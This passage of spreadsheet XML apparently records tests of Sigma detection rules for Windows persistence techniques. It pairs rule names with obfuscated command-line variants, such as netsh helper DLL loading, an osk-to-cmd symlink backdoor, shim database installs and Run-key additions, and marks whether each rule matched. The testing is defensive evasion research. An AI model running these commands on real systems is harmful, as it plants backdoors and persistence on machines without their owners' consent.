      <c r="H605" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I605" s="44" t="n"/>
      <c r="J605" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K605" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="606" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A606" s="43" t="inlineStr">
        <is>
          <t>t1546.001</t>
        </is>
      </c>
      <c r="B606" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_assoc_execution</t>
        </is>
      </c>
      <c r="C606" s="43" t="inlineStr">
        <is>
          <t>Change Default File Association Via Assoc</t>
        </is>
      </c>
      <c r="D606" s="43" t="inlineStr">
        <is>
          <t>3d3aa6cd-6272-44d6-8afc-7e88dfef7061</t>
        </is>
      </c>
      <c r="E606" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-Item -Path 'HKLM:\SOFTWARE\Classes\.hta' -Value 'txtfile' -Force"</t>
        </is>
      </c>
      <c r="F606" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G606" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H606" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I606" s="44" t="n"/>
      <c r="J606" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K606" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="607" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A607" s="44" t="inlineStr">
        <is>
          <t>t1546.001</t>
        </is>
      </c>
      <c r="B607" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_assoc_execution</t>
        </is>
      </c>
      <c r="C607" s="44" t="inlineStr">
        <is>
          <t>Change Default File Association Via Assoc</t>
        </is>
      </c>
      <c r="D607" s="44" t="inlineStr">
        <is>
          <t>3d3aa6cd-6272-44d6-8afc-7e88dfef7061</t>
        </is>
      </c>
      <c r="E607" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set ASSOC_CMD=assoc&amp;&amp; call %ASSOC_CMD% .hta=txtfile"</t>
        </is>
      </c>
      <c r="F607" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G607" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H607" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I607" s="44" t="n"/>
      <c r="J607" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K607" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="608" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A608" s="43" t="n"/>
      <c r="B608" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_assoc_tamper_exe_file_association</t>
        </is>
      </c>
      <c r="C608" s="43" t="inlineStr">
        <is>
          <t>Change Default File Association To Executable Via Assoc</t>
        </is>
      </c>
      <c r="D608" s="43" t="inlineStr">
        <is>
          <t>ae6f14e6-14de-45b0-9f44-c0986f50dc89</t>
        </is>
      </c>
      <c r="E608" s="44" t="n"/>
      <c r="F608" s="44" t="n"/>
      <c r="G608" s="44" t="n"/>
      <c r="H608" s="44" t="n"/>
      <c r="I608" s="44" t="n"/>
      <c r="J608" s="44" t="n"/>
      <c r="K608" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="609" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A609" s="43" t="inlineStr">
        <is>
          <t>t1546.003</t>
        </is>
      </c>
      <c r="B609" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_eventconsumer_creation</t>
        </is>
      </c>
      <c r="C609" s="43" t="inlineStr">
        <is>
          <t>New ActiveScriptEventConsumer Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D609" s="43" t="inlineStr">
        <is>
          <t>ebef4391-1a81-4761-a40a-1db446c0e625</t>
        </is>
      </c>
      <c r="E609" s="44" t="n"/>
      <c r="F609" s="44" t="n"/>
      <c r="G609" s="44" t="n"/>
      <c r="H609" s="44" t="n"/>
      <c r="I609" s="44" t="n"/>
      <c r="J609" s="44" t="n"/>
      <c r="K609" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="610" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A610" s="43" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B610" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C610" s="43" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D610" s="43" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E610" s="44" t="n"/>
      <c r="F610" s="44" t="n"/>
      <c r="G610" s="44" t="n"/>
      <c r="H610" s="44" t="n"/>
      <c r="I610" s="44" t="n"/>
      <c r="J610" s="44" t="n"/>
      <c r="K610" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="611" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A611" s="44" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B611" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C611" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D611" s="44" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E611" s="44" t="inlineStr">
        <is>
          <t>netsh.exe "add" helper "C:\AtomicRedTeam\atomics\T1546.007_x0008_in\NetshHelper.dll"</t>
        </is>
      </c>
      <c r="F611" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G611" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H611" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I611" s="44" t="n"/>
      <c r="J611" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K611" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="612" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A612" s="43" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B612" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C612" s="43" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D612" s="43" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E612" s="44" t="inlineStr">
        <is>
          <t>netsh.exe add "hel""per" "C:\AtomicRedTeam\atomics\T1546.007_x0008_in\NetshHelper.dll"</t>
        </is>
      </c>
      <c r="F612" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G612" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H612" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I612" s="44" t="n"/>
      <c r="J612" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K612" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="613" ht="15.75" customHeight="1" s="42">
      <c r="A613" s="44" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B613" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C613" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D613" s="44" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E613" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "netsh.exe ad^d helper "C:\AtomicRedTeam\atomics\T1546.007_x0008_in\NetshHelper.dll""</t>
        </is>
      </c>
      <c r="F613" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G613" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H613" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I613" s="44" t="n"/>
      <c r="J613" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K613" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="614" ht="15.75" customHeight="1" s="42">
      <c r="A614" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B614" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C614" s="43" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D614" s="43" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E614" s="44" t="n"/>
      <c r="F614" s="44" t="n"/>
      <c r="G614" s="44" t="n"/>
      <c r="H614" s="44" t="n"/>
      <c r="I614" s="44" t="n"/>
      <c r="J614" s="44" t="n"/>
      <c r="K614" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="615" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A615" s="44" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B615" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C615" s="44" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D615" s="44" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E615" s="44" t="inlineStr">
        <is>
          <t>cmd /c "m""klink C:\Windows\System32\osk.exe C:\Windows\System32\cmd.exe"</t>
        </is>
      </c>
      <c r="F615" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G615" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H615" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I615" s="44" t="n"/>
      <c r="J615" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K615" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="616" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A616" s="44" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B616" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C616" s="44" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D616" s="44" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E616" s="44" t="inlineStr">
        <is>
          <t>cmd /c mklink C:\Windows\System32\osk.exe C:\Windows\System32\cmd</t>
        </is>
      </c>
      <c r="F616" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G616" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H616" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I616" s="44" t="n"/>
      <c r="J616" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K616" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="617" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A617" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B617" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C617" s="43" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D617" s="43" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E617" s="44" t="inlineStr">
        <is>
          <t>cmd /c mklink C:\Windows\System32\.\osk.exe C:\Windows\System32\..\System32\cmd.exe</t>
        </is>
      </c>
      <c r="F617" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G617" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H617" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I617" s="44" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd (e9b61244-893f-427c-b287-3e708f321c6b); Potential Privilege Escalation Using Symlink Between Osk and Cmd (e9b61244-893f-427c-b287-3e708f321c6b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J617" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K617" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="618" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A618" s="44" t="n"/>
      <c r="B618" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_key_like_backdoor_execution</t>
        </is>
      </c>
      <c r="C618" s="43" t="inlineStr">
        <is>
          <t>Sticky Key Like Backdoor Execution</t>
        </is>
      </c>
      <c r="D618" s="43" t="inlineStr">
        <is>
          <t>2fdefcb3-dbda-401e-ae23-f0db027628bc</t>
        </is>
      </c>
      <c r="E618" s="44" t="n"/>
      <c r="F618" s="44" t="n"/>
      <c r="G618" s="44" t="n"/>
      <c r="H618" s="44" t="n"/>
      <c r="I618" s="44" t="n"/>
      <c r="J618" s="44" t="n"/>
      <c r="K618" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="619" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A619" s="44" t="inlineStr">
        <is>
          <t>t1546.011</t>
        </is>
      </c>
      <c r="B619" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sdbinst_shim_persistence</t>
        </is>
      </c>
      <c r="C619" s="44" t="inlineStr">
        <is>
          <t>Potential Shim Database Persistence via Sdbinst.EXE</t>
        </is>
      </c>
      <c r="D619" s="44" t="inlineStr">
        <is>
          <t>517490a7-115a-48c6-8862-1a481504d5a8</t>
        </is>
      </c>
      <c r="E619" s="44" t="n"/>
      <c r="F619" s="44" t="n"/>
      <c r="G619" s="44" t="n"/>
      <c r="H619" s="44" t="n"/>
      <c r="I619" s="44" t="n"/>
      <c r="J619" s="44" t="n"/>
      <c r="K619" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="620" ht="15.75" customHeight="1" s="42">
      <c r="A620" s="44" t="inlineStr">
        <is>
          <t>t1546.011</t>
        </is>
      </c>
      <c r="B620" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sdbinst_shim_persistence</t>
        </is>
      </c>
      <c r="C620" s="44" t="inlineStr">
        <is>
          <t>Potential Shim Database Persistence via Sdbinst.EXE</t>
        </is>
      </c>
      <c r="D620" s="44" t="inlineStr">
        <is>
          <t>517490a7-115a-48c6-8862-1a481504d5a8</t>
        </is>
      </c>
      <c r="E620" s="44" t="inlineStr">
        <is>
          <t>sdbinst.exe "C:\AtomicRedTeam\atomics\T1546.011\bin\AtomicShimx86.sd""b"</t>
        </is>
      </c>
      <c r="F620" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G620" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H620" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I620" s="44" t="inlineStr">
        <is>
          <t>Uncommon Extension Shim Database Installation Via Sdbinst.EXE (18ee686c-38a3-4f65-9f44-48a077141f42)</t>
        </is>
      </c>
      <c r="J620" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K620" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="621" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A621" s="44" t="inlineStr">
        <is>
          <t>t1546.011</t>
        </is>
      </c>
      <c r="B621" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sdbinst_shim_persistence</t>
        </is>
      </c>
      <c r="C621" s="44" t="inlineStr">
        <is>
          <t>Potential Shim Database Persistence via Sdbinst.EXE</t>
        </is>
      </c>
      <c r="D621" s="44" t="inlineStr">
        <is>
          <t>517490a7-115a-48c6-8862-1a481504d5a8</t>
        </is>
      </c>
      <c r="E621" s="44" t="inlineStr">
        <is>
          <t>sdbinst.exe "\\?\C:\AtomicRedTeam\atomics\T1546.011\bin\AtomicShimx86.sdb "</t>
        </is>
      </c>
      <c r="F621" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G621" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H621" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I621" s="44" t="inlineStr">
        <is>
          <t>Potential Shim Database Persistence via Sdbinst.EXE (517490a7-115a-48c6-8862-1a481504d5a8)</t>
        </is>
      </c>
      <c r="J621" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K621" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="622" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A622" s="44" t="inlineStr">
        <is>
          <t>t1546.011</t>
        </is>
      </c>
      <c r="B622" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sdbinst_shim_persistence</t>
        </is>
      </c>
      <c r="C622" s="44" t="inlineStr">
        <is>
          <t>Potential Shim Database Persistence via Sdbinst.EXE</t>
        </is>
      </c>
      <c r="D622" s="44" t="inlineStr">
        <is>
          <t>517490a7-115a-48c6-8862-1a481504d5a8</t>
        </is>
      </c>
      <c r="E622" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c sdbinst.exe "C:\AtomicRedTeam\atomics\T1546.011\bin\AtomicShimx86.sd^b"</t>
        </is>
      </c>
      <c r="F622" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G622" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H622" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I622" s="44" t="inlineStr">
        <is>
          <t>Uncommon Extension Shim Database Installation Via Sdbinst.EXE (18ee686c-38a3-4f65-9f44-48a077141f42)</t>
        </is>
      </c>
      <c r="J622" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K622" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="623" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A623" s="44" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B623" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C623" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D623" s="44" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E623" s="44" t="n"/>
      <c r="F623" s="44" t="n"/>
      <c r="G623" s="44" t="n"/>
      <c r="H623" s="44" t="n"/>
      <c r="I623" s="44" t="n"/>
      <c r="J623" s="44" t="n"/>
      <c r="K623" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="624" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A624" s="44" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B624" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C624" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D624" s="44" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E624" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\rundll32.exe" /localserver {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}</t>
        </is>
      </c>
      <c r="F624" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G624" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H624" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I624" s="44" t="n"/>
      <c r="J624" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K624" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="625" ht="15.75" customHeight="1" s="42">
      <c r="A625" s="44" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B625" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C625" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D625" s="44" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E625" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\rundll32.exe" "-sta "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}</t>
        </is>
      </c>
      <c r="F625" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G625" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H625" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I625" s="44" t="n"/>
      <c r="J625" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K625" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="626" ht="15.75" customHeight="1" s="42">
      <c r="A626" s="44" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B626" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C626" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D626" s="44" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E626" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\System32\rundll32.exe" -st^a {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}</t>
        </is>
      </c>
      <c r="F626" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G626" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H626" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I626" s="44" t="n"/>
      <c r="J626" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K626" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="627" ht="15.75" customHeight="1" s="42">
      <c r="A627" s="44" t="inlineStr">
        <is>
          <t>t1547</t>
        </is>
      </c>
      <c r="B627" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_grpconv</t>
        </is>
      </c>
      <c r="C627" s="44" t="inlineStr">
        <is>
          <t>Suspicious GrpConv Execution</t>
        </is>
      </c>
      <c r="D627" s="44" t="inlineStr">
        <is>
          <t>f14e169e-9978-4c69-acb3-1cff8200bc36</t>
        </is>
      </c>
      <c r="E627" s="44" t="n"/>
      <c r="F627" s="44" t="n"/>
      <c r="G627" s="44" t="n"/>
      <c r="H627" s="44" t="n"/>
      <c r="I627" s="44" t="n"/>
      <c r="J627" s="44" t="n"/>
      <c r="K627" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="628" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A628" s="44" t="n"/>
      <c r="B628" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_add_run_key</t>
        </is>
      </c>
      <c r="C628" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Run Keys Using Reg.EXE</t>
        </is>
      </c>
      <c r="D628" s="44" t="inlineStr">
        <is>
          <t>de587dce-915e-4218-aac4-835ca6af6f70</t>
        </is>
      </c>
      <c r="E628" s="44" t="n"/>
      <c r="F628" s="44" t="n"/>
      <c r="G628" s="44" t="n"/>
      <c r="H628" s="44" t="n"/>
      <c r="I628" s="44" t="n"/>
      <c r="J628" s="44" t="n"/>
      <c r="K628" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="629" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A629" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B629" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_add_run_key</t>
        </is>
      </c>
      <c r="C629" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Run Keys Using Reg.EXE</t>
        </is>
      </c>
      <c r="D629" s="44" t="inlineStr">
        <is>
          <t>de587dce-915e-4218-aac4-835ca6af6f70</t>
        </is>
      </c>
      <c r="E629" s="44" t="inlineStr">
        <is>
          <t>reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f</t>
        </is>
      </c>
      <c r="F629" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G629" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H629" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I629" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Run Keys Using Reg.EXE (de587dce-915e-4218-aac4-835ca6af6f70); Direct Autorun Keys Modification (24357373-078f-44ed-9ac4-6d334a668a11)</t>
        </is>
      </c>
      <c r="J629" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K629" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="630" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A630" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B630" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_add_run_key</t>
        </is>
      </c>
      <c r="C630" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Run Keys Using Reg.EXE</t>
        </is>
      </c>
      <c r="D630" s="44" t="inlineStr">
        <is>
          <t>de587dce-915e-4218-aac4-835ca6af6f70</t>
        </is>
      </c>
      <c r="E630" s="44" t="inlineStr">
        <is>
          <t>reg "add" HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f</t>
        </is>
      </c>
      <c r="F630" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G630" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H630" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I630" s="44" t="inlineStr">
        <is>
          <t>Direct Autorun Keys Modification (24357373-078f-44ed-9ac4-6d334a668a11)</t>
        </is>
      </c>
      <c r="J630" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K630" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="631" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A631" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B631" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_add_run_key</t>
        </is>
      </c>
      <c r="C631" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Run Keys Using Reg.EXE</t>
        </is>
      </c>
      <c r="D631" s="44" t="inlineStr">
        <is>
          <t>de587dce-915e-4218-aac4-835ca6af6f70</t>
        </is>
      </c>
      <c r="E631" s="44" t="inlineStr">
        <is>
          <t>reg add HKCU\Software\Microsoft\Windows\CurrentVersion\\Run /v NetWire /t REG_SZ /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f</t>
        </is>
      </c>
      <c r="F631" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G631" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H631" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I631" s="44" t="n"/>
      <c r="J631" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K631" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="632" ht="15.75" customHeight="1" s="42">
      <c r="A632" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B632" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_task_folder_evasion</t>
        </is>
      </c>
      <c r="C632" s="44" t="inlineStr">
        <is>
          <t>Tasks Folder Evasion</t>
        </is>
      </c>
      <c r="D632" s="44" t="inlineStr">
        <is>
          <t>cc4e02ba-9c06-48e2-b09e-2500cace9ae0</t>
        </is>
      </c>
      <c r="E632" s="44" t="n"/>
      <c r="F632" s="44" t="n"/>
      <c r="G632" s="44" t="n"/>
      <c r="H632" s="44" t="n"/>
      <c r="I632" s="44" t="n"/>
      <c r="J632" s="44" t="n"/>
      <c r="K632" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="633" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A633" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B633" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C633" s="44" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D633" s="44" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E633" s="44" t="n"/>
      <c r="F633" s="44" t="n"/>
      <c r="G633" s="44" t="n"/>
      <c r="H633" s="44" t="n"/>
      <c r="I633" s="44" t="n"/>
      <c r="J633" s="44" t="n"/>
      <c r="K633" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="634" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A634" s="44" t="n"/>
      <c r="B634" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C634" s="44" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
